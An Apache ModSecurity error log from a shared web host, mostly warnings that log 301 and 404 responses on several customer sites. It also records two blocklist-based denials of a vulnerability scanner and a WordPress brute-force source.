[Tue May 26 19:59:23.314348 2026] [security2:error] [pid 93576:tid 93758] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuQGDRMqfxdEDkoszuIgAAAC4"]
[Tue May 26 19:59:23.315528 2026] [security2:error] [pid 93576:tid 93731] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuQGDRMqfxdEDkoszuKAAAABM"]
[Tue May 26 19:59:23.325674 2026] [security2:error] [pid 93576:tid 93801] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuQGDRMqfxdEDkoszuKwAAAFk"]
[Tue May 26 19:59:23.337321 2026] [security2:error] [pid 93576:tid 93718] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuQWDRMqfxdEDkoszuZQAAAAY"]
[Tue May 26 19:59:23.338805 2026] [security2:error] [pid 93576:tid 93781] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuQWDRMqfxdEDkoszuZAAAAEU"]
[Tue May 26 19:59:23.339875 2026] [security2:error] [pid 93576:tid 93776] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuQGDRMqfxdEDkoszuMAAAAEA"]
[Tue May 26 19:59:23.340883 2026] [security2:error] [pid 93576:tid 93769] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuQGDRMqfxdEDkoszuKgAAADk"]
[Tue May 26 19:59:23.352821 2026] [security2:error] [pid 93576:tid 93717] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuQGDRMqfxdEDkoszuMgAAAAU"]
[Tue May 26 19:59:23.353117 2026] [security2:error] [pid 93868:tid 94345] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuQUqK9k_ZUB2Vp254yAAAAeY"]
[Tue May 26 19:59:23.362804 2026] [security2:error] [pid 93868:tid 94281] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuQUqK9k_ZUB2Vp254xgAAAaY"]
[Tue May 26 19:59:23.366011 2026] [security2:error] [pid 93868:tid 94377] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuQUqK9k_ZUB2Vp254wwAAAgY"]
[Tue May 26 19:59:23.373672 2026] [security2:error] [pid 93576:tid 93805] [client 45.92.1.17:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "consultrgb.com"] [uri "/site/index.php"] [unique_id "ahWuPWDRMqfxdEDkosztJgAAAF0"]
[Tue May 26 19:59:23.381904 2026] [security2:error] [pid 93868:tid 94327] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuQUqK9k_ZUB2Vp254yQAAAdQ"]
[Tue May 26 19:59:23.383015 2026] [security2:error] [pid 93868:tid 94369] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuQUqK9k_ZUB2Vp254ygAAAf4"]
[Tue May 26 19:59:23.390662 2026] [security2:error] [pid 93576:tid 93720] [client 45.92.1.17:58020] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "moes-art.com"] [uri "/index.php"] [unique_id "ahWuPGDRMqfxdEDkoszsfAAAAAg"], referer: www.google.com
[Tue May 26 19:59:23.396673 2026] [security2:error] [pid 93576:tid 93763] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuQWDRMqfxdEDkoszuYwAAADM"]
[Tue May 26 19:59:23.397299 2026] [security2:error] [pid 93868:tid 94312] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuQUqK9k_ZUB2Vp2542gAAAcU"]
[Tue May 26 19:59:23.398221 2026] [security2:error] [pid 93868:tid 94297] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuQUqK9k_ZUB2Vp254zAAAAbY"]
[Tue May 26 19:59:23.405541 2026] [security2:error] [pid 93576:tid 93812] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuQGDRMqfxdEDkoszuMQAAAGQ"]
[Tue May 26 19:59:23.437780 2026] [security2:error] [pid 93576:tid 93740] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuQWDRMqfxdEDkoszuawAAABw"]
[Tue May 26 19:59:23.439275 2026] [security2:error] [pid 93576:tid 93750] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuQWDRMqfxdEDkoszuagAAACY"]
[Tue May 26 19:59:23.442479 2026] [security2:error] [pid 93576:tid 93789] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuQWDRMqfxdEDkoszucgAAAE0"]
[Tue May 26 19:59:23.447686 2026] [security2:error] [pid 93868:tid 94262] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuQUqK9k_ZUB2Vp2544gAAAZM"]
[Tue May 26 19:59:23.451071 2026] [security2:error] [pid 106517:tid 106652] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuQYZZc2DoU1lPnP1ORQAAAIc"]
[Tue May 26 19:59:23.451107 2026] [security2:error] [pid 93868:tid 94347] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuQUqK9k_ZUB2Vp2544wAAAeg"]
[Tue May 26 19:59:23.457805 2026] [security2:error] [pid 93868:tid 94260] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuQUqK9k_ZUB2Vp2542wAAAZE"]
[Tue May 26 19:59:23.463683 2026] [security2:error] [pid 93576:tid 93824] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuQmDRMqfxdEDkoszujgAAAHA"]
[Tue May 26 19:59:23.467807 2026] [security2:error] [pid 93576:tid 93761] [client 45.92.1.17:58229] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "poonawallatennisacademy.com"] [uri "/index.php"] [unique_id "ahWuQmDRMqfxdEDkoszukAAAADE"], referer: www.google.com
[Tue May 26 19:59:23.468256 2026] [security2:error] [pid 93868:tid 94320] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuQUqK9k_ZUB2Vp2544AAAAc0"]
[Tue May 26 19:59:23.473929 2026] [security2:error] [pid 93868:tid 94317] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuQUqK9k_ZUB2Vp2545AAAAco"]
[Tue May 26 19:59:23.821194 2026] [security2:error] [pid 93868:tid 94279] [client 45.92.1.17:58021] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 17.1.92.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "moes-art.com"] [uri "/wp-content/plugins/apikey/apikey.php"] [unique_id "ahWuQ0qK9k_ZUB2Vp255OwAAAaQ"]
[Tue May 26 19:59:24.342843 2026] [security2:error] [pid 93576:tid 93807] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuQ2DRMqfxdEDkoszusAAAAF8"]
[Tue May 26 19:59:24.346559 2026] [security2:error] [pid 93868:tid 94384] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuQ0qK9k_ZUB2Vp255IAAAAg0"]
[Tue May 26 19:59:24.355424 2026] [security2:error] [pid 93868:tid 94285] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuQ0qK9k_ZUB2Vp255IQAAAao"]
[Tue May 26 19:59:24.357233 2026] [security2:error] [pid 106517:tid 106708] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuQ4ZZc2DoU1lPnP1OZgAAAL4"]
[Tue May 26 19:59:24.375590 2026] [security2:error] [pid 93868:tid 94306] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuQ0qK9k_ZUB2Vp255KwAAAb8"]
[Tue May 26 19:59:24.388989 2026] [security2:error] [pid 93868:tid 94362] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuQ0qK9k_ZUB2Vp255HQAAAfc"]
[Tue May 26 19:59:24.391043 2026] [security2:error] [pid 93576:tid 93784] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuQ2DRMqfxdEDkoszuqgAAAEg"]
[Tue May 26 19:59:24.394541 2026] [security2:error] [pid 106517:tid 106693] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuQ4ZZc2DoU1lPnP1OWQAAAK8"]
[Tue May 26 19:59:24.396812 2026] [security2:error] [pid 93576:tid 93731] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuQ2DRMqfxdEDkoszutQAAABM"]
[Tue May 26 19:59:24.399987 2026] [security2:error] [pid 93868:tid 94350] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuQ0qK9k_ZUB2Vp255HAAAAes"]
[Tue May 26 19:59:24.400207 2026] [security2:error] [pid 93868:tid 94298] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuQ0qK9k_ZUB2Vp255IwAAAbc"]
[Tue May 26 19:59:24.401058 2026] [security2:error] [pid 93868:tid 94304] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuQ0qK9k_ZUB2Vp255IgAAAb0"]
[Tue May 26 19:59:24.402142 2026] [security2:error] [pid 106517:tid 106706] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuQ4ZZc2DoU1lPnP1OZQAAALw"]
[Tue May 26 19:59:24.404728 2026] [security2:error] [pid 93576:tid 93746] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuQ2DRMqfxdEDkoszutAAAACI"]
[Tue May 26 19:59:24.411491 2026] [security2:error] [pid 106517:tid 106707] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuQ4ZZc2DoU1lPnP1OZAAAAL0"]
[Tue May 26 19:59:24.414094 2026] [security2:error] [pid 93576:tid 93839] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuQ2DRMqfxdEDkoszutgAAAH8"]
[Tue May 26 19:59:24.419037 2026] [security2:error] [pid 106517:tid 106703] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuQ4ZZc2DoU1lPnP1OYQAAALk"]
[Tue May 26 19:59:24.422406 2026] [security2:error] [pid 93868:tid 94270] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuQ0qK9k_ZUB2Vp255HwAAAZs"]
[Tue May 26 19:59:24.432525 2026] [security2:error] [pid 106517:tid 106710] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuQ4ZZc2DoU1lPnP1OZwAAAMA"]
[Tue May 26 19:59:24.451142 2026] [security2:error] [pid 93868:tid 94330] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuQ0qK9k_ZUB2Vp255MgAAAdc"]
[Tue May 26 19:59:24.775749 2026] [security2:error] [pid 93868:tid 94126] [remote 18.209.220.99:10479] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 99.220.209.18.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWuREqK9k_ZUB2Vp255SwABpzY"]
[Tue May 26 19:59:25.274835 2026] [security2:error] [pid 106517:tid 106711] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuQ4ZZc2DoU1lPnP1OaAAAAME"]
[Tue May 26 19:59:25.280266 2026] [security2:error] [pid 93868:tid 94325] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuQ0qK9k_ZUB2Vp255NwAAAdI"]
[Tue May 26 19:59:25.284182 2026] [security2:error] [pid 93868:tid 94322] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuQ0qK9k_ZUB2Vp255NQAAAc8"]
[Tue May 26 19:59:25.300833 2026] [security2:error] [pid 93576:tid 93736] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuQ2DRMqfxdEDkoszuxgAAABg"]
[Tue May 26 19:59:25.303225 2026] [security2:error] [pid 93576:tid 93776] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuQ2DRMqfxdEDkoszuxQAAAEA"]
[Tue May 26 19:59:25.307004 2026] [security2:error] [pid 106517:tid 106690] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuQ4ZZc2DoU1lPnP1ObgAAAKw"]
[Tue May 26 19:59:25.308629 2026] [security2:error] [pid 93868:tid 94326] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuQ0qK9k_ZUB2Vp255OAAAAdM"]
[Tue May 26 19:59:25.313711 2026] [security2:error] [pid 93576:tid 93749] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuQ2DRMqfxdEDkoszuxwAAACU"]
[Tue May 26 19:59:25.322692 2026] [security2:error] [pid 93576:tid 93817] [client 45.92.1.17:58759] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "veganfoodindia.com"] [uri "/index.php"] [unique_id "ahWuQ2DRMqfxdEDkoszuoQAAAGk"], referer: www.google.com
[Tue May 26 19:59:25.336474 2026] [security2:error] [pid 93576:tid 93815] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuRGDRMqfxdEDkoszu4wAAAGc"]
[Tue May 26 19:59:25.344154 2026] [security2:error] [pid 93576:tid 93715] [client 45.92.1.17:58020] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "moes-art.com"] [uri "/index.php"] [unique_id "ahWuQ2DRMqfxdEDkoszuowAAAAM"], referer: www.google.com
[Tue May 26 19:59:25.350921 2026] [security2:error] [pid 93576:tid 93762] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuRGDRMqfxdEDkoszu5gAAADI"]
[Tue May 26 19:59:25.351922 2026] [security2:error] [pid 93576:tid 93782] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuRGDRMqfxdEDkoszu4QAAAEY"]
[Tue May 26 19:59:25.355812 2026] [security2:error] [pid 93576:tid 93828] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuRGDRMqfxdEDkoszu5wAAAHQ"]
[Tue May 26 19:59:25.359178 2026] [security2:error] [pid 93576:tid 93778] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuRGDRMqfxdEDkoszu3wAAAEI"]
[Tue May 26 19:59:25.362816 2026] [security2:error] [pid 93576:tid 93837] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuRGDRMqfxdEDkoszu2wAAAH0"]
[Tue May 26 19:59:25.363352 2026] [security2:error] [pid 93576:tid 93728] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuRGDRMqfxdEDkoszu4AAAABA"]
[Tue May 26 19:59:25.372503 2026] [security2:error] [pid 106517:tid 106756] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuRIZZc2DoU1lPnP1OgAAAAO4"]
[Tue May 26 19:59:25.375836 2026] [security2:error] [pid 93576:tid 93727] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuRGDRMqfxdEDkoszu5QAAAA8"]
